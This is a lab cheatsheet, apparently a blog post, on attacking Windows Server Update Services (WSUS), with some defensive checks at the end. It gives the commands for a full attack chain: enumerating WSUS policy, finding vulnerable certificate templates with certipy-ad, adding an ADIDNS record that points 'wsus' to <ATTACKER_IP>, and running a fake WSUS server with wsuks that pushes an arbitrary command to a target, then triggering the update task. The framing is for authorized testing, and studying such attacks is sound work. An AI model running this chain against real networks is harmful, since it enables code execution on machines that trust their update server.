2026-04-20 • wsus

WSUS - Cheatsheet

Lab-ready WSUS enumeration, fake-server workflow checkpoints, and defensive verification commands.

WSUS Cheatsheet (Authorized Lab Use)

Use this only in authorized environments (HTB, personal AD lab, sanctioned assessment).

1) Quick WSUS endpoint discovery

PowerShell (host side)

Get-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate" |
  Select-Object WUServer, WUStatusServer, TargetGroup

Get-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" |
  Select-Object UseWUServer, AUOptions, ScheduledInstallDay, ScheduledInstallTime

CMD

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU

2) DNS and name-resolution validation

nslookup wsus.example.local <DC_IP>
dig +short wsus.example.local @<DC_IP>

Check whether the WSUS name is missing, stale, or unexpectedly mutable.

3) ADCS / certificate pre-checks (lab)

certipy-ad find -u <user> -p '<pass>' -dc-ip <DC_IP> -enabled -vulnerable

Goal: identify whether certificate policy can be abused to impersonate WSUS TLS identity in a chained scenario.

4) ADIDNS record management (lab)

python3 dnstool.py -u '<domain>\\<user>' -p '<pass>' \
  --dc-ip <DC_IP> --dns-ip <DC_IP> \
  -r wsus -a query <DC_HOST>

python3 dnstool.py -u '<domain>\\<user>' -p '<pass>' \
  --dc-ip <DC_IP> --dns-ip <DC_IP> \
  -r wsus -a add -d <ATTACKER_IP> <DC_HOST>

5) Fake WSUS workflow checkpoint (lab)

Example workflow often seen in training labs:

1. validate client WSUS policy,
2. validate DNS resolution path,
3. ensure TLS trust preconditions are met,
4. run controlled fake WSUS service,
5. trigger update cycle from test host,
6. collect telemetry/evidence.

Example command style:

sudo wsuks --serve-only -t <TARGET_IP> \
  --WSUS-Port 8531 \
  --tls-cert <combined_pem> \
  -c '<lab_command>' \
  -I <interface>

Trigger cycle on host:

schtasks /Run /TN "<update_task_name>"

6) Useful WSUS admin command

Export/import metadata between WSUS servers:

wsusutil.exe export export.xml.gz export.log
wsusutil.exe import export.xml.gz import.log

7) Defensive quick checks

Group membership / privilege review

Get-ADGroupMember -Identity "Remote Management Users"
Get-ADUser <user> -Properties MemberOf | Select-Object -ExpandProperty MemberOf

DNS monitoring focus

• alert on creation/modification of critical WSUS-related records,
• baseline expected WSUS A/CNAME records and detect drift.

Certificate hygiene focus

• review enabled templates and enrollment scope,
• block broad enrollment where subject/SAN control is weak.

8) Troubleshooting notes

• If fake WSUS flow fails early: verify DNS resolution from target first.
• If TLS handshake fails: validate cert CN/SAN and full trust chain.
• If update trigger appears silent: check policy keys and task names on target.
• If telemetry is missing: confirm logging/audit policy is active on DC and target.

Related note

• Conceptual overview: WSUS Overview